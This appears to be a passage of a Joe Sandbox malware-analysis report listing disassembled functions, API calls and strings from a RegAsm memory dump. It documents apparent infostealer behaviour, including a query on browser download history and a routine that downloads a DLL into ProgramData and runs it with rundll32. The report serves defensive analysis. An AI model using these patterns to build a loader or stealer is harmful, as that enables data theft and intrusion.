Instruction ID: 21dd88cd5308e306890444f7ddf1049af0295f33d9c7c9fbe8389be5c3b36deb
Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction Fuzzy Hash: 17B1BDB5A04302AFCB04CF29DC81AAAB7E5FF98254F44452DF948D3711E739F9248BA5

Function 00408022 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00408027

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

lstrlenA.KERNEL32(00000000), ref: 004082F3
lstrlenA.KERNEL32(00000000), ref: 00408307

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Downloads, xrefs: 004080DA
Downloads, xrefs: 00408057
SELECT target_path, tab_url from downloads, xrefs: 004081C4

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 3193997572-2241552939
Opcode ID: 20d0ab3ffbdea04d307fbd2ed09569c13fc689aeae1bf93c7325943a022d8e4a
Instruction ID: d29831c9e37ed535599b007c4b85b3d4954a6b9aee878767d3a134e4e1f994ac
Opcode Fuzzy Hash: 20d0ab3ffbdea04d307fbd2ed09569c13fc689aeae1bf93c7325943a022d8e4a
Instruction Fuzzy Hash: DFB18231804148EEDB09EBE5D956BEDBBB4AF18308F10415EE056731C2DFB82B88DB65

Function 004146C5 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 255COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004146CA

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2

ShellExecuteEx.SHELL32(?), ref: 00414999

Strings

C:\Windows\system32\rundll32.exe, xrefs: 004148BE
C:\ProgramData\, xrefs: 0041470E
"" , xrefs: 004147CB
.dll, xrefs: 0041478C

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Internetlstrcpy$CloseHandle$FileOpenlstrcat$CreateExecuteReadShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 1286380332-2108736111
Opcode ID: 385c06684d207b492ba9f0715200da31d8292b8e03caad48a7cc927bc6b5d0fb
Instruction ID: 0ff6851dedcb9237b82c82971b9f0ba35dfa2521f43906a968e4506caad7270a
Opcode Fuzzy Hash: 385c06684d207b492ba9f0715200da31d8292b8e03caad48a7cc927bc6b5d0fb
Instruction Fuzzy Hash: 81B15F31C0529CEADB15EBE5C955BDEBBB8AF18308F10815EE41173186DBB82788CF65

Function 1B695930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

CREATE TABLE x(input, token, start, end, position), xrefs: 1B695933
unknown tokenizer: %s, xrefs: 1B695B28
simple, xrefs: 1B695A38, 1B695A84, 1B695A95, 1B695B27

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
API String ID: 0-2679805236
Opcode ID: c6e46639e33bcc40dec45a827afd46387617dbb6678876e1a77bf13378ab62c5
Instruction ID: a75c44f1053ca422ad850f67f24c4cfff801e4108567648b68097d877a692a59
Opcode Fuzzy Hash: c6e46639e33bcc40dec45a827afd46387617dbb6678876e1a77bf13378ab62c5
Instruction Fuzzy Hash: 0E7114B19043468FDB04DF28EC94ADAB7E4FF94254F080529EC89D7201EB71E949CFA6

Function 1B79F0E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 216COMMON

Download Yara Rule

Strings

unable to delete/modify user-function due to active statements, xrefs: 1B79F157, 1B79F298
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B79F1DC, 1B79F31D
%s at line %d of [%.10s], xrefs: 1B79F1EB, 1B79F32C
misuse, xrefs: 1B79F1E6, 1B79F327

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 0560e8a75008a7ec12d2d063011affa0780819289fc441fe6ed1cfdd60359442
Instruction ID: 59c14525269d8d62895bb918ef8438c6e9e386f8407dedb9eabaf518fa251cb9
Opcode Fuzzy Hash: 0560e8a75008a7ec12d2d063011affa0780819289fc441fe6ed1cfdd60359442
Instruction Fuzzy Hash: AA6158B5A40B026BE701AE20FC46BDF77A4AF41725F040128F9195F2C2E7A5F254C7E5

Function 1B6B09C2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 1B6B0B3B

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
API String ID: 0-2869280805
Opcode ID: 0086d0d4ab93c1203d4e16563f902d86d87064c9344081292a128b00c6de6c3d
Instruction ID: 8c0db5157a05b4874ab8e51f20ef9746fdd1f3366f005cb5de9744fd89d25930
Opcode Fuzzy Hash: 0086d0d4ab93c1203d4e16563f902d86d87064c9344081292a128b00c6de6c3d
Instruction Fuzzy Hash: 1741C3BAB013019FDB009F58EC809D6F7B5FF98225B00497EF64487621E772E854C7A0

Function 1B6A3F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

remove_diacritics=1, xrefs: 1B6A3FA2
separators=, xrefs: 1B6A40A3
remove_diacritics=0, xrefs: 1B6A3FE1
tokenchars=, xrefs: 1B6A406A
remove_diacritics=2, xrefs: 1B6A4021

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
API String ID: 0-131617836
Opcode ID: d037a6a41e5ca786a9bb7cc4d31a21638930680c310e8517830a65ce8cbe83f6
Instruction ID: dcf6958f356f53ae374440d1716c370d1e77f82c68cf04aec80f883d4e025e1f
Opcode Fuzzy Hash: d037a6a41e5ca786a9bb7cc4d31a21638930680c310e8517830a65ce8cbe83f6
Instruction Fuzzy Hash: BF5108B5E042828BDB009F34D8807E6F7B1BF62724F8441A8E88A5B245D772ED86D751

Function 1B6A1120 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

main, xrefs: 1B6A11A6
rbu_memory, xrefs: 1B6A11F5

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: main$rbu_memory
API String ID: 0-3973752345
Opcode ID: e23b75604a2b221e22774f4d30b7cd782a9ef4565225ed452418fcbcf4fc8f91
Instruction ID: 560932ccc77b050c2f2c6eeb7327f97aa1904ceb8aaef29575d6067b5fd2a287
Opcode Fuzzy Hash: e23b75604a2b221e22774f4d30b7cd782a9ef4565225ed452418fcbcf4fc8f91
Instruction Fuzzy Hash: 5C51BFF5A01302DFDF008F6AD894BDAB7E8BF66655F00402AE889D7640D735ED49CB61

Function 1B7A9350 Relevance: 10.6, APIs: 7, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e3dded6a28bc39b6814406190a5ee310b6423c0b6a4461935745fb77bc2f7d
Instruction ID: a63c50ed7f2e1f422e8da2804d77f9146ac2d2d3583a572753094fc005a06c8a
Opcode Fuzzy Hash: 96e3dded6a28bc39b6814406190a5ee310b6423c0b6a4461935745fb77bc2f7d
Instruction Fuzzy Hash: D15150F4480222DBDB889F35DC8DAEB37BCBF10A55F044126F84AD6151DB35E46CCA66

Function 1B7315C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

null, xrefs: 1B7315EE
%!0.15g, xrefs: 1B73160A
JSON cannot hold BLOB values, xrefs: 1B7316D9

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$JSON cannot hold BLOB values$null
API String ID: 0-3074873597
Opcode ID: 7dcfe8b55b83046fd17ea6c55f031ecf7605badc486d36a541ab454af4011e27
Instruction ID: 54cca493e616a613a7afeeb9cd332f4065a9e4fcbb61b13fba583dde8400db62
Opcode Fuzzy Hash: 7dcfe8b55b83046fd17ea6c55f031ecf7605badc486d36a541ab454af4011e27
Instruction Fuzzy Hash: 25414EB5A00700EAE7105B56FC86BDB77B4DB4132BF080529F592C29A3D769A5D883E1

Function 1B6A1D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 1B6A1E2C
no such database: %s, xrefs: 1B6A1E05

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
API String ID: 0-1404816483
Opcode ID: d96a2139f8aad6b3d8540454a56b14df3c0d998af1c3e960a9c4420a217e18f9
Instruction ID: d479939a7fc26553fdf73153ec0dcd25209bd77237d445cc94070edd831299d5
Opcode Fuzzy Hash: d96a2139f8aad6b3d8540454a56b14df3c0d998af1c3e960a9c4420a217e18f9
Instruction Fuzzy Hash: 873136B5601309ABCB105F7AEC41BDBB7D8FF92261F000169FD5897240EA76E80087E1

Function 00410170 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00410184
??_U@YAPAXI@Z.MSVCRT ref: 004101A5

Part of subcall function 0040FFBE: strlen.MSVCRT ref: 0040FFCA
Part of subcall function 0040FFBE: strlen.MSVCRT ref: 0040FFE0
Part of subcall function 0040FFBE: strlen.MSVCRT ref: 00410079

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 004101D2
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0041029C
??_V@YAXPAX@Z.MSVCRT ref: 004102AD

Strings

@, xrefs: 004101EB

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$QueryVirtual
String ID: @
API String ID: 3099930812-2766056989
Opcode ID: ed0060925190887529a7005716ec5ae67a287d2f756f91219cf10def04ef4a31
Instruction ID: 6369093116528879ce7ac296ed84e42a6f2290047d72d499b57dbda31d52bc8e
Opcode Fuzzy Hash: ed0060925190887529a7005716ec5ae67a287d2f756f91219cf10def04ef4a31
Instruction Fuzzy Hash: 2C419F71A00109EFDF10DF91DD49AEE7BB6EF48314F14806AF904A2150D7798E908BA8

Function 00412745 Relevance: 10.6, APIs: 7, Instructions: 119stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041274A
strtok_s.MSVCRT ref: 00412775
StrCmpCA.SHLWAPI(00000000,004276D4,00000001,?,?,?,00000000), ref: 004127B8
StrCmpCA.SHLWAPI(00000000,004276D0,00000001,?,?,?,00000000), ref: 004127E6
StrCmpCA.SHLWAPI(00000000,004276CC,00000001,?,?,?,00000000), ref: 0041280B
StrCmpCA.SHLWAPI(00000000,004276C8,00000001,?,?,?,00000000), ref: 0041283C
strtok_s.MSVCRT ref: 00412872

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prolog
String ID:
API String ID: 1158113254-0
Opcode ID: ed552e791d81dc94fde04f444568443972d745201ce8858a057a31f820a0ff22
Instruction ID: 2ee770e07d530aa2307f59e79d679cd3bebeaaa1e97602db57672fb824a5794a
Opcode Fuzzy Hash: ed552e791d81dc94fde04f444568443972d745201ce8858a057a31f820a0ff22
Instruction Fuzzy Hash: E041A171B00206ABCB18DF65CE85BEAB7E8EB14315F10162FE005E6591E7BCCAD5CB58

Function 1B6B9CD0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

